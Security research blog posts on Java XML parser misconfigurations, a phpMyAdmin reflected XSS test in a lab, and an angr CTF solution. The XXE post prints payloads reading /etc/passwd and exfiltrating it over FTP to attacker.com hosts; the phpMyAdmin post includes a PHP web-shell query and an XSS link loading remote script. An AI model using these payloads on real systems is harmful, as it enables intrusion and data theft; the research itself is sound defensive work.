Wednesday, February 17, 2021

Misconfigurations in Java XML Parsers

 


XML is a powerful data format that can elegantly encapsulate any conceivable kind of information.  To ensure that this complex data adheres to a pre-defined structure, XML documents can specify a DTD – a helper document that defines the expected structure of the data.  And to help simplify the contents of a complex document, XML allows for External Entities – bits of content that can be included in a document by reference, like a link in a web page.  DTDs and External Entities are additional content for XML software to process, but this kind of software is often written with a focus on the actual XML document, with less attention paid to the details of processing DTDs and External Entities.  An XML External Entity attack, or XXE attack, attempts to find vulnerabilities in software that processes DTDs and External Entities of XML documents.

In particular, Java applications using XML parser libraries are often vulnerable to XXE because most Java XML parsers enable DTD processing and external entities by default.

The definitive solution to avoid XXE issues is to disable DTD (and External Entity) processing. However, for several reasons, developers do not always disable it completely: it could be by mistake, because the application needs DTDs, or because it is simply not possible. When DTD processing is necessary, developers should disable external entities and external document type declarations in order to avoid XXE issues.

How to disable these features varies from parser to parser, which can be confusing for the developer and can lead to misconfigurations that expose the application to a security issue. In this article we will discuss a few scenarios and present a novel one that is not always considered.

Let’s start by taking a look at javax.xml.parsers.DocumentBuilderFactory:

File fXmlFile = new File("Test.xml");
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder dBuilder = dbf.newDocumentBuilder();
Document doc = dBuilder.parse(fXmlFile);


This is the default configuration for DocumentBuilderFactory which IS affected by an XXE issue.
 
Occasionally, I have seen the following settings in the DocumentBuilderFactory object to try to remediate the security hole:

dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false); 


This configuration does prevent XXE attacks as well as XInclude attacks. It does not, however, prevent Server-Side Request Forgery (SSRF), since DTD processing is still enabled. One way to abuse this is to use a "Public" entity such as:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE myPublicEntity PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://someIP:4444/IMMUNITY' >


But what if we use the following settings:

dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);


This will protect against XXE, since external entities are disabled, as well as external parameter entities. However, we can still perform SSRF with the help of "Public" entities. In order to fix this, the developer needs to add the following setting:

dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);


This will protect against SSRF using 'Public' entities. Of course, it would be safer to disable DTDs completely by using:

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);



Let’s try again, what if we use:

dbf.setAttribute(XMLConstants.FEATURE_SECURE_PROCESSING, true);



The Java 7/8 documentation reference says:


But this configuration does not prevent XXE or SSRF and, honestly, I couldn't find any difference when using this setting during my tests. Maybe the objective is only to protect against DoS (as mentioned in the documentation).


Then we have:


This feature could bring some confusion and a false sense of security to developers, as it doesn't provide any protection against XXE or SSRF through "Public" entities.



Let's look at another example, using the javax.xml.validation.SchemaFactory:

String filepath = "Test_Schema.xml";
String xmlSchema = new String(Files.readAllBytes(Paths.get(filepath)));

SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");           
Schema schema = factory.newSchema(new StreamSource(new StringReader(xmlSchema)));


This code excerpt is affected by XXE by default. The general recommendation is to set the following properties in order to prevent XXE issues:

factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");


Both properties work in much the same way and let developers choose which protocols are allowed for external references. The documentation about them says:

     Default value: The default value is implementation specific and therefore not specified.
     The following options are provided for consideration:

      1. an empty string to deny all access to external references;
      2. a specific protocol, such as file, to give permission to only the protocol;
      3. the keyword "all" to grant permission to all protocols.
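
To make the three options concrete, here is a minimal Python sketch of how such an allow-list could be evaluated. It is only a toy model, not the JDK's implementation: the function name `is_access_allowed` is made up for illustration, and the comma-separated list form is an assumption based on the JAXP documentation.

```python
from urllib.parse import urlsplit


def is_access_allowed(system_id, allowed):
    """Toy model of the documented options (hypothetical helper, not JDK code)."""
    allowed = allowed.strip()
    if allowed == "":
        # Option 1: an empty string denies all external references
        return False
    if allowed.lower() == "all":
        # Option 3: the keyword "all" grants access to every protocol
        return True
    # Option 2: only the listed protocols (schemes) are permitted
    permitted = {p.strip().lower() for p in allowed.split(",")}
    return urlsplit(system_id).scheme.lower() in permitted


print(is_access_allowed("http://example.com/a.dtd", ""))      # False
print(is_access_allowed("http://example.com/a.dtd", "file"))  # False
print(is_access_allowed("file:///etc/passwd", "file"))        # True
```

Note that the check in this model only looks at the scheme of the reference, so any URL starting with `file:` passes when "file" is allowed.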



Now, let's analyze the following configuration:

factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "file");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");


The first line allows only the use of the file protocol, and it seems that the property "ACCESS_EXTERNAL_DTD" takes precedence over "ACCESS_EXTERNAL_SCHEMA", which is configured to deny all access to external references.


This configuration is affected by a classic XXE injection issue if the results of the parsing are returned to the user. If you remember, the 'Classic' payload uses the *file* protocol:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM 'file:///etc/passwd'>
]>
<foo>&xxe;</foo>


However, this configuration appears to prevent a Blind XXE because http/s and ftp are not allowed. Therefore, if the app does not show the results to the user (no classic XXE injection is possible), this configuration seems safe by preventing Blind XXE attacks. Turns out this isn't true.

By digging a little deeper into the JDK protocol handlers, last year I discovered that it is also possible to exfiltrate a file using FTP without using the ftp scheme directly.

Analyzing the openConnection() method of the sun.net.www.protocol.file.Handler class, we can see that it makes an FTP request if the URL's host is not null, “”, “~”, or “localhost” (1). Therefore, simply by using an IP address as the host we reach this section of the code, where it is easy to see that a URL instance is created using “ftp” (2). No port is passed as a parameter, so the handler uses the default FTP port, 21. Then the openConnection() method of the URL class is called to perform the connection via FTP (3).



Therefore, this configuration does not mitigate a Blind XXE, as we can still use the FTP via file protocol.
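
The decision described above can be modelled in a few lines of Python. This is a sketch of the logic as described in this post, not the JDK source: `resolve_file_url` and `LOCAL_HOSTS` are hypothetical names, and details of the real handler (error handling, fallbacks) are left out.

```python
from urllib.parse import urlsplit

# Hosts that the file handler treats as "this machine" (per the text above)
LOCAL_HOSTS = {"", "~", "localhost"}


def resolve_file_url(url):
    """Return ("local", path) or ("ftp", ftp_url) for a file: URL (toy model)."""
    parts = urlsplit(url)
    if parts.scheme != "file":
        raise ValueError("not a file: URL")
    host = parts.hostname or ""
    if host.lower() in LOCAL_HOSTS:
        # No real host: the path is opened from the local file system
        return ("local", parts.path)
    # Any other host: an ftp URL is built from host and path only, so the
    # port from the original URL is dropped and the FTP default (21) applies
    return ("ftp", "ftp://%s%s" % (host, parts.path))


print(resolve_file_url("file:///etc/passwd"))
print(resolve_file_url("file://attacker.com:5555/evil_ftp.dtd"))
```

In this model the second call yields an FTP URL pointing at attacker.com, even though only the "file" protocol was ever named in the payload.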


Exploitation


The procedure to leverage this issue is like the 'Out-of-Band' (OOB) XXE or Blind XXE; however, in this case it requires two FTP services: one to host the malicious DTD and another to receive the content of the file that we want to exfiltrate. Remember that in both cases we need to use the default FTP port, 21.

This is the XML payload:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM  "file://attacker.com:5555/evil_ftp.dtd">
  %dtd; 
]>
<data>&send;</data>



Again, the port does not affect the behavior. It will always use the FTP default port.

This is the content of the evil_ftp.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY send SYSTEM 'file://attacker2.com:5555/%file;'>"> 
%param1;


Now we need to host the evil_ftp.dtd using an FTP server.


The steps are the following:
    1. Host the _evil_ftp.dtd_ file, which should be in the current directory, using:
        sudo python xxeftp_mod.py
    2. Start the FTP service on another host:
        sudo python xxeftp.py
    3. Send the XML payload to the parser.
    4. Profit!



If you want to test it, you can use the _/jaxp/InlineSchemaValidator.java_ sample provided in the Xerces2 source code in its latest release, [Xerces-J-src.2.12.1.tar.gz](https://apache.dattatec.com//xerces/j/source/Xerces-J-src.2.12.1.tar.gz).

This sample application is vulnerable to XXE by default and can be used to test some of the anti-XXE features that I described in this post. To test the OOB technique using the 'file' payload you only need to add the "ACCESS_EXTERNAL_DTD" attribute to the javax.xml.parsers.DocumentBuilderFactory instance located at line 479.


Final Comments

    1. If the XML parser has DTD processing enabled, analyze all the other settings as well. The applied settings could lead to other vulnerabilities (less serious but still important, such as SSRF).
    2. Check it in a local environment: create an XML parser with the same settings and test it. You can also debug it and analyze it.
    3. Sometimes the XML parser settings do not do what they seem to; you need to track them down through the code.
    4. The best solution is to disable DTD processing completely.
    5. Some notes about the exfiltration: the latest updates of Java 7 (1.7_80) and 8 (1.8.0_281) do not allow illegal characters in FTP URLs, so it is no longer possible to exfiltrate files containing LF (Line Feed) characters, like /etc/passwd. However, you can still exfiltrate /etc/issue as a simple Proof-of-Concept. This URL validation has been present in the FTP handler since Java version 11.


~Anibal Irrera


Wednesday, February 6, 2019

PHPMyAdmin 3.5.X-3.5.8 Reflected XSS: What could have been, but really wasn't.

(This blog post is from Leff (Lautaro Fain), one of our consultants, and I asked him to do a special project, as documented below.)

1. Introduction

A few days ago Dave asked me to take advantage of a known vuln affecting PHPMyAdmin MySQL Management Platforms (Versions 3.5.X to 3.5.8) in order to gain a Web Shell or Admin Rights Access to the server. It was nothing more than a common Reflected Cross-Site Scripting issue taking place in an ‘in attribute’ context. The vuln is conveniently described in the links below:

https://www.first.org/cvss/examples#1-phpMyAdmin-Reflected-Cross-site-Scripting-Vulnerability-CVE-2013-1937

https://www.exploit-db.com/exploits/38440

This is the theoretical severity scoring from the team at FIRST:




This document enumerates the ways I tried to exploit this issue, and provides a more accurate ranking of the vulnerability’s technical risk.

2. Exploitation Phase

Taking a closer look at the issue...




As soon as the task was given, I grabbed a vulnerable PHPMyAdmin version (this being 3.5.1, https://www.phpmyadmin.net/files/) and began the installation process in order to make a local lab to test the issue.

Once the ‘server’ was running smoothly (fixed some issues and then ran ‘php -S localhost:8085’ in a terminal), I decided to take a look at the vulnerable files to see by eye if the issue was present.



After reaching the ‘tbl_gis_visualization.php’ file and reading the code, we can infer that the ‘visualizationSettings[‘width’]’ and ‘visualizationSettings[‘height’]’ parameters are indeed our entry point to exploit this vulnerability, as they get rendered back in the HTML code without any kind of sanitization.



To move forward, we need to test whether the statement above is correct and then try to exploit this issue with our bare hands. To first confirm that we are right, a simple XSS payload ("><script>alert('Immunity INC.')</script>) was provided and executed within the context of an already logged-in user (‘root’ in this case).



Analyzing possible attack vectors

It worked as expected - we are for sure facing an ‘In Attribute’ Cross-Site Scripting vulnerability. Now, let's check if we can make some malicious things out of that. For further understanding, let me explain the two most common techniques that are used to take over PHPMyAdmin or MySQL Servers.

a) The ‘SELECT INTO OUTFILE’ technique: So, by its very own nature, PHPMyAdmin gives us the chance to execute SQL Queries through a web interface and, as our objective would be creating a new PHP file that works as Web Shell, this is almost a win-win situation for us. We go straight to the objective and run the necessary queries to check if indeed this can be done from here (‘SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "/imm_shell.php";’) but well, it's not that easy.



MySQL servers have this tiny global variable called ‘secure_file_priv’, which restricts the directories that file import and export operations can use. Let's take a look at it by using: ‘SELECT @@secure_file_priv;’.

HA! Can’t get surprised anymore, this variable is set to ‘NULL’ by default and in real case scenarios, the database admin will set it to allow writing in directories that are NOT exposed to the outside world (like ‘/tmp’ or ‘/custom_dir’ instead of using ‘/var/www’ to create temporary files or storing persistent files). Anyways, as we all know, there can still be some cases where this variable allows MySQL file writing in root web server directories (yes, I'm mentioning ‘/var/www’ again as an example) that can be accessed through the browser which means that this technique (if possible to achieve) will get us an immediate web shell!

But sadly, this is not the case for us, and as this variable cannot be set through PHPMyAdmin queries or configuration environments (it needs to be changed in the ‘my.ini’ file within the MySQL folder), we can't bypass this.

b) Creating a New Privileged User through SQL Queries: This is another possible attack vector, we can execute the queries needed to create a new user in the database, this user would need to have enough privileges to do the same things as the ‘root’ or ‘admin’ user usually does. Sounds good, let's make it happen (using this query ‘GRANT ALL PRIVILEGES ON *.* TO 'immtest'@'localhost' IDENTIFIED BY 'immtest';’):



Let’s log in with these new credentials; they should work as expected.





Awesome, they do work and have all the possible privileges! But wait, remember that we created this user while logged in with the ‘root’ user credentials. Not cool - what if during a real case scenario we manage to find credentials that belong to a less privileged user, can we still make this happen? Let's check this with another user: we will create one with default privileges and then try to create a new user with that account.





New user created, as you may have seen, he cannot see anything apart from the classic system tables. Let's suppose we have grabbed his credentials and we want to create a new user, but this time with this ‘immtest_nopriv’ account.





Okay, no surprises again. What is happening here? We cannot create a new user with all privileges from an account that does not have enough privileges to do so. This means that if the credentials we grabbed are not allowed to create highly privileged users (that is set by the database admin), we won't be able to create a user that can do anything more than read system tables, or we may not be able to create a new user at all.

So, where do we stand here? Well, we can still make use of our XSS issue to execute queries inside PHPMyAdmin - so let’s create a payload to make that happen!

Creating our payload

For length reasons, this payload will need to be created as a single JavaScript file and be served from a malicious server so we can retrieve it when trying to exploit our vulnerability.

To begin, as always, we grab the POST request made from the client side to the server using Burp so we can check the sent parameters and values to replicate that in our code.




We modified the ‘sql_query’ parameter with some SQL instructions (that being ‘GRANT ALL PRIVILEGES ON *.* TO 'xssuser'@'localhost' IDENTIFIED BY 'xssuser';’) to check if everything runs smoothly and we can indeed send whatever query we want to the server side.



Awesome, the user we created now exists, this means that all works as expected. Let’s dive into the Javascript code creation.




Some explanation might come in handy, so I will enumerate some of the payload behaviour below:

  1. We need to grab the victim’s token before making any request; it works as a ‘csrf’ token and a sort of session token at once (despite PHPMyAdmin also using the widely known ’phpMyAdmin’ cookie). That's what the first line does: we dynamically retrieve it from a hidden input in the vulnerable web page using JavaScript.
  2. The desired query to execute is specified on the second line.
  3. We replicated the HTTP POST request body, so the server gets what it expects and nothing more than that (third line).
  4. The target endpoint is set on the sixth line.
  5. And finally, we use JavaScript's built-in ‘fetch’ function to make an HTTP POST request that bypasses CORS and then send another GET request to our malicious server, specifying the response status as an endpoint.
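
The payload itself is JavaScript, but the first three steps can be sketched in Python to make the data flow easier to follow. This is a hypothetical analog, not the payload used here: the helper names, the `name="token"` attribute on the hidden input, and the reduced set of body fields (`token`, `db`, `sql_query`) are assumptions, and the real request captured with Burp carries more parameters.

```python
import re
from urllib.parse import urlencode


def extract_token(html):
    """Step 1: pull the 32-hex-char token out of a hidden input (assumed markup)."""
    match = re.search(r'<input[^>]*name="token"[^>]*value="([0-9a-f]{32})"', html)
    return match.group(1) if match else None


def build_query_body(token, sql_query, db="information_schema"):
    """Steps 2 and 3: put the chosen query and the token into a form-encoded body."""
    return urlencode({"token": token, "db": db, "sql_query": sql_query})


# Sample page fragment, invented for the example
page = '<input type="hidden" name="token" value="550a80691c075e6b4a4e0c9f410a1db4" />'
token = extract_token(page)
print(build_query_body(token, "SELECT 1;"))
```

The point is only that whoever can read the page can also read the token, which is what running script inside the victim's session provides.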

As you might expect, this is not a difficult thing to do. We can now exploit this vulnerability by referencing our malicious code.

Yay! Time to exploit this thing!


We change the ‘sql_query’ parameter to hold whatever we want to; this time, I will create another user called ‘leff_exploit_test’ to check that it works.



After hosting the file on our malicious server and exploiting the scenario (we got 200 as an HTTP status!), we can test if the user was indeed created.







Awesome, this worked! This is a Reflected XSS Vulnerability, we will use this to make victims execute arbitrary Javascript code within their browser when clicking a specially crafted link. Let’s try that!

3. Showstopper realizations


Time to reach the finish line, this link will be the one that triggers the exploit we made:


http://localhost:8085/tbl_gis_visualization.php?db=information_schema&token=550a80691c075e6b4a4e0c9f410a1db4&visualizationSettings[width]=%22%3E%3Cscript%20src=%22http://localhost:5555/test.js%22%3E%3C/script%3E


But wait, did you notice something? The token value also travels in the GET request. THAT’S NOT GOOD! We cannot exploit that, since that token belongs to the user himself and there’s no way we can retrieve it before crafting the malicious URL (at least in the position we are in now). We can try some things to see whether the server fails to enforce proper checks on that parameter. Can we send requests to the server without providing the correct token, or without providing a token at all? Common tests involve:

  1. Sending an empty token parameter.
  2. Sending a badly crafted token parameter.
  3. Not sending the token parameter.
  4. Sending the token parameter as an array type parameter (Just for PHP Servers).
  5. Sending the token parameter holding a null value.
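
These checks are easy to script. The sketch below builds one URL per test case from a captured link; `token_variants` is a hypothetical helper, the 'malformed' value is arbitrary, and interpreting "null value" as a URL-encoded null byte is an assumption.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def token_variants(url, param="token"):
    """Return a dict of test-case name -> URL with the token parameter altered."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    # Every parameter except the token is carried over unchanged
    others = [(k, v) for k, v in pairs if k != param]
    cases = {
        "empty": others + [(param, "")],
        "malformed": others + [(param, "not-a-real-token")],
        "missing": others,
        "array": others + [(param + "[]", "")],  # PHP parses this as an array
        "null": others + [(param, "\x00")],      # encoded as %00
    }
    return {name: urlunsplit(parts._replace(query=urlencode(query)))
            for name, query in cases.items()}


base = "http://localhost:8085/tbl_gis_visualization.php?db=information_schema&token=abc"
for name, variant in token_variants(base).items():
    print(name, variant)
```

Each resulting URL can then be requested from a logged-in browser session while watching whether the malicious server receives a hit.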












After trying all of these options, none of them seemed to work: our malicious server did not receive any request, and nothing had changed since the first time we exploited the issue.



There is still one more thing to check - is this token predictable? If so, we might still have a chance to abuse this issue, so let's search for the code that generates this attribute value. Following its trail led us to the ‘url_generating.lib.php’ file; it seems that the actual token value is retrieved from the session object, and is therefore created there.



We need to search for ‘PMA_token’ instead of the ‘token’ word now.



So, we found this again, but if you look carefully, the token is crafted in the following way:

  1. rand() is called with no fixed or predictable seed, which rules out predicting the value returned by that call. When called that way, rand() returns a pseudo-random integer between 0 and getrandmax().
  2. The output of that call is passed as input to uniqid() along with ‘true’, which means that a unique ID will be generated with a length of 23 characters instead of 13, adding even more entropy to the result.
  3. That output is the input of an MD5 hash function, and the resulting hash is the value assigned to the token.
  4. On Windows platforms, there is some discussion of the value of uniqid being predictable to a “second” of resolution, but this does not seem likely to be fruitful with our particular code-path (which has more_entropy=true).

Finally, we can infer this token works as an Anti-CSRF one, and prevents us from crafting malicious links that when clicked will make victims execute our desired MySQL queries on their server.
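
To get a feel for the shape of such a token, here is a rough Python model of the md5(uniqid(rand(), true)) construction described above. It is an illustration under assumptions, not PHP's implementation: `uniqid_like` and `token_like` are hypothetical names, Python's `random` module stands in for PHP's rand() and its extra-entropy source, and the exact string format is an approximation of what uniqid() produces.

```python
import hashlib
import random
import time


def uniqid_like(prefix="", more_entropy=False):
    """Approximate uniqid(): prefix + hex seconds (8) + hex microseconds (5)."""
    now = time.time()
    sec = int(now)
    usec = int((now - sec) * 1000000)
    uid = "%s%08x%05x" % (prefix, sec, usec)
    if more_entropy:
        # Extra pseudo-random suffix such as "3.14159265" (10 characters)
        uid += "%.8f" % (random.random() * 10)
    return uid


def token_like():
    """MD5 over a uniqid-style string prefixed with a pseudo-random integer."""
    prefix = str(random.randint(0, 2**31 - 1))  # stand-in for PHP's rand()
    return hashlib.md5(uniqid_like(prefix, True).encode("ascii")).hexdigest()


print(len(uniqid_like()), len(uniqid_like("", True)))
print(token_like())
```

An attacker would have to guess the timestamp down to the microsecond plus both pseudo-random components to reproduce the hash input, which is why guessing the token is not a practical route here.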

4. Conclusion

As we have seen above, this vulnerability cannot be exploited in the wild, as we would first need to predict the token needed to perform those requests. We will need to assign a proper CVSS (v2 & v3) score to each of the cases we have here, namely:
  1. We have the possibility to predict the needed token.
  2. We cannot predict the needed token.
So, before going into that phase, let’s analyze each score metric for each vulnerability case:

CASE A

I will walk you through ‘Case A’ first, a scenario where we can (in some way) predict the token that is needed to perform requests to execute arbitrary MySQL queries in the backend server. For the score calculation we will keep in mind the worst case scenario (or the best for the attacker), which involves an improperly configured backend database and a user who has enough privileges to do whatever he wants there.

As queries can be sent by triggering the XSS, the old ‘SELECT INTO OUTFILE’ technique can also be used to compromise the server with a shell and the attacker will be able to read whatever he wants, dump whatever he wants and modify the integrity of what he wants thus affecting directly the Confidentiality, Integrity and Availability of the whole service. All of this will be triggered after the user clicks the pre-crafted malicious link that the attacker provided. Keep in mind that the potential impact on the database is what increases the severity of the issue itself and that the victim user needs to be logged in when clicking the link (as with any XSS).

CVSS v2.0 (Predictable token);
Overall CVSS Score: 5.6 (AV:N/AC:H/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)

CVSS v3.0 (Predictable token);
Overall CVSS Score: 8.0 (High) (AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C)
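
As a sanity check, the CVSS v2.0 figure above can be reproduced from its vector. The sketch below applies the published CVSS v2 base and temporal equations; the function name `cvss2_scores` is made up for the example, environmental metrics are ignored, and only the v2 vector is covered.

```python
# Metric weights from the CVSS v2 specification
AV = {"L": 0.395, "A": 0.646, "N": 1.0}
AC = {"H": 0.35, "M": 0.61, "L": 0.71}
AU = {"M": 0.45, "S": 0.56, "N": 0.704}
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}
E = {"U": 0.85, "POC": 0.9, "F": 0.95, "H": 1.0, "ND": 1.0}
RL = {"OF": 0.87, "TF": 0.90, "W": 0.95, "U": 1.0, "ND": 1.0}
RC = {"UC": 0.90, "UR": 0.95, "C": 1.0, "ND": 1.0}


def cvss2_scores(vector):
    """Return (base, temporal) scores for a CVSS v2 vector string."""
    m = dict(item.split(":") for item in vector.split("/"))
    impact = 10.41 * (1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]]))
    exploitability = 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]
    f_impact = 0.0 if impact == 0 else 1.176
    base = round((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact, 1)
    # Temporal metrics default to "Not Defined" (weight 1.0) when absent
    temporal = round(base * E[m.get("E", "ND")] * RL[m.get("RL", "ND")]
                     * RC[m.get("RC", "ND")], 1)
    return base, temporal


print(cvss2_scores("AV:N/AC:H/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C"))  # (7.1, 5.6)
```

The base score of 7.1 drops to 5.6 once the proof-of-concept exploitability and official-fix remediation level are factored in, which matches the overall v2 score listed above.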

CASE B

In ‘Case B’, which is the most realistic one, this issue cannot be used to target another user. Under the actual conditions this is just a Self-XSS (also known as “not a vulnerability”, or a CVSS v3.0 score of 0), because we cannot predict the victim's token and use it to craft the malicious URL; we can only access our own token and trigger the vulnerability on our side once we have already logged in. This bug is not exploitable within the described context. It’s worth noting that at no point does HTTPOnly on the cookie come into our analysis, as mentioned in the original FIRST.org analysis.

Wednesday, November 2, 2016

Solving Sokohashv2.0 full of Angr on Ekoparty 2016



In memory of Pocho, the Panther. RIP buddy.


Last Ekoparty I got the chance to try my luck solving one of Core Security's challenges. For a while I have been hearing great things about angr, so I wanted to get to the solution using it.

Angr is a Python binary analysis framework that provides a quite clean API to a powerful symbolic executor (built around vex intermediate code) and a solving back-end (provided by a z3 wrapper called claripy). 

I have to admit that it took me a while to solve the challenge (I did not win :( ), I have only my own very limited intellect and lack of familiarity with the tool to blame. But what I lack in intelligence I have in perseverance so let us solve this with, as always, maximum effort.

The Sokohash V2 challenge imitates the rules of the known Sokoban puzzle game (https://en.wikipedia.org/wiki/Sokoban). Through a Rogue-like interface you get four "boxes" (x,y,z,w) that the player has to move to their corresponding correct positions. 


Sokohash interface - it is a bit off because I ran it in Wine :P

Unlike Sokoban there are no limits to the number of steps or pushes the player can make. In Sokohash, the game assigns a hash to each position on the board, then on each movement it takes the hashes of each box and calculates a global hash with the current state of the board. The objective of the challenge is to have that global hash match the winning hash:

C03922D0206DC3A33016010D6C66936E953ABAB9000010AE805CE8463CBE9A2D

As I want to get a sense of what angr can do for me, I’ll keep my binary analysis to a minimum. I basically have the following needs:

  • Identify where the global hash is calculated.
  • Identify where the hash is stored.
  • Identify the function input and verify how it is related to the boxes' coordinates/hashes.
  • Model the hash calculation with angr.

First we need to locate the function that calculates the hash. This is a simple step, we take a look at the strings with IDA and "Calculating hash..." takes us to the right spot.






After that, it was pretty straightforward to locate the function input by putting a breakpoint at the correct place, in my case 0x40101a (*). After the canary, the function copies 32 bytes from the stack and uses them as local data. Just by looking at the process screen it is evident that those 32 bytes correspond to the hashes of each of the boxes, 8 bytes each; the position of the player seems to be irrelevant.

(*) I ran the Win32 binary with Wine and debugged it with GDB. Why? Because I was feeling wild and reckless.
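
The input layout described above (32 bytes, one 8-byte hash per box) can be sketched with the standard `struct` module. This is only an illustration: `split_box_hashes` is a hypothetical helper, and the little-endian byte order and the x, y, z, w ordering are assumptions taken from how the solution values are decoded later in this post.

```python
import struct


def split_box_hashes(buf):
    """Split the 32-byte function input into four 64-bit box hashes."""
    if len(buf) != 32:
        raise ValueError("expected exactly 32 bytes, got %d" % len(buf))
    # "<4Q" = four little-endian unsigned 64-bit integers
    x, y, z, w = struct.unpack("<4Q", buf)
    return {"x": x, "y": y, "z": z, "w": w}


# Dummy input, not real game data
sample = struct.pack("<4Q", 1, 2, 3, 4)
print(split_box_hashes(sample))
```

Seen this way, the function under analysis takes four 64-bit values as input and nothing else, which is what makes it a good target for symbolic execution.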



Then we look for the place where the calculated hash is stored; this is also easy using IDA/GDB.






So now we know what the input is and where the output is stored. We might as well spin up angr and see what it says. We are going to tell angr to find a path between start_addr and to_find. As the input values that cause the function to walk that path will evidently not be unique (there are barely any code constraints between the start and the end), we will also need to tell angr that we expect the input values to produce the winning hash, by setting specific logical constraints on the resulting path.

As the output hash is not stored in memory in a linear fashion, I just made a helper Python function to help set up the constraints on the memory output.

import angr
import sys
import simuvex
import struct
from itertools import combinations, product

WIN_HASH = "C03922D0206DC3A33016010D6C66936E953ABAB9000010AE805CE8463CBE9A2D".decode("hex")

def do_nothing(state):
    pass

def do_repmovsd(state):
    # angr does not like rep movsd
    # we do it by hand
    buffer = state.memory.load(state.regs.esi, 8 * 4)
    state.memory.store(state.regs.edi, buffer)

def get_hash_map(init_addr):
    # Helper function to get each address where a byte
    # of the calculated hash is going to be stored, in the
    # proper order
    addr = init_addr
    hash_map = []
    for i in xrange(0, len(WIN_HASH), 2):
        pair = WIN_HASH[i:i+2]
        hash_map.append((addr, ord(pair[1])))
        hash_map.append((addr+1, ord(pair[0])))
        addr += 8    

    return hash_map


def main():
    proj = angr.Project('sokohashv2.0.exe', use_sim_procedures=True, load_options={"auto_load_libs": False})

    # ADDRS 
    main = 0x401013 # The start of our path, just after the canary
    to_find = 0x0040123E # The end, just before the security check
    hash_addr = 0x04216C0 # The address where the output hash will be stored

    # HOOKS - We avoid any function call that does not alter
    # our result
    func_hooks = [0x0040102C, 0x0401033]
    for addr in func_hooks:
        proj.hook(addr, do_nothing, length=6) 

    func_hooks = [0x401215, 0x40121E, 0x401239, 0x40123C]
    for addr in func_hooks:
        proj.hook(addr, do_nothing, length=2) 

    # We need to hook the rep movsd because the symbolic execution
    # fails to resolve it. We model it by hand
    proj.hook(0x0401028, do_repmovsd, length=2)
    proj.hook(0x0401253, do_nothing, length=5) 
    proj.hook(0x040103E, do_nothing, length=5) 
    proj.hook(0x0401225, do_nothing, length=5) 
    proj.hook(0x0401243, do_nothing, length=5) 

    # initial state
    init = proj.factory.blank_state(addr=main)
    
    # we set some registers to get a context closer to real world
    init.regs.ebp = init.regs.esp + 0x78
    buffer = init.memory.load(init.regs.ebp + 0x8, 0x20)
        
    pg = proj.factory.path_group(init, threads=8)
    pg.explore(find=to_find)

    path = pg.found[0]

    found = path.state

    # We print the expected hash for verification
    conds = []
    expected = []
    hash_map = get_hash_map(hash_addr)
    for addr, value in hash_map:       
        memory = found.memory.load(addr, 1, endness=proj.arch.memory_endness) 

        # Here we declare that each byte in the output hash must be
        # part of the winning hash
        conds.append((memory == value))
        expected.append((hex(addr), hex(value)))
    print "Expected is '%s'\n\n" % expected

    found.add_constraints(init.se.And(*conds))

    # We print the resulting hash for verification
    result = []
    hash_map = get_hash_map(hash_addr)
    for addr, value in hash_map:       
        buf_ptr = found.memory.load(addr, 1)
        possible = found.se.any_int(buf_ptr)
        result.append((hex(addr), "0x%x" % possible))
    print "Result is '%s'\n\n" % result

    # Print solutions
    possible = found.se.any_n_int(buffer, 1) # We ask for the first solution
    for i, f in enumerate(possible):
        out = "%x" % f
        if len(out) < (0x20*2):
            continue

        names = ["x","y","z","w"]
        values = []
        for j in xrange(0, len(out), 16):
            value = out[j:j+16]
            unpk_value = struct.unpack("<Q", value.decode("hex"))[0]

            values.append((names[j//16], "%.16x" % unpk_value))
        print "\tSolution %d: %s" % (i, values)


if __name__ == '__main__':
    #angr.path_group.l.setLevel('DEBUG')
    main()

If we run it we get:



Bingo! But if we check the solution in the actual game we won't get the winning hash. Maybe there is more than one solution, so we can just ask the solver for more of them by using the line:

...
possible = found.se.any_n_int(buffer, 10) # Give me 10 solutions if possible
...





With lots of solutions checking each one will be very time consuming and we may never arrive at the correct one. As we narrow the output using constraints maybe we also need to narrow the input. To do this we need to ask ourselves the question: What is the relationship between the position hash and the box coordinates? 

Turns out that by looking at the caller of "x_calc_hash" we can see that the coordinates are used to read data from memory. If we take a look at the memory region where the data is read from, it is full of hashes; it turns out that each hash corresponds to a board position. So the ideal approach is to find where those hashes are stored, dump them, and then use them to add the proper constraints. We do that by finding the first and last hash and then finding their memory addresses with GDB.





We can easily map each hash to a coordinate using Python, but first we need the x,y coordinate pairs. The board is 27x17, but we also need to consider that there are positions on the board that cannot be reached (the portal, the letters in "CORE", the inside of the letters). To get an accurate coordinate map we need to exclude these positions from it, for example, using the function below:

def get_valid_coords():
    var = """#                            #
#            O               #
#         x                  #
#                   w        #
#           *                #
# ##    ####   ######   ###  #
##  #  ##  ##  ##  ##  ##    #
##     ##  ##  ##  ##  ##    #
##     ##  ##  #####   ####  #
##     ##  ##  ## ##   ##    #
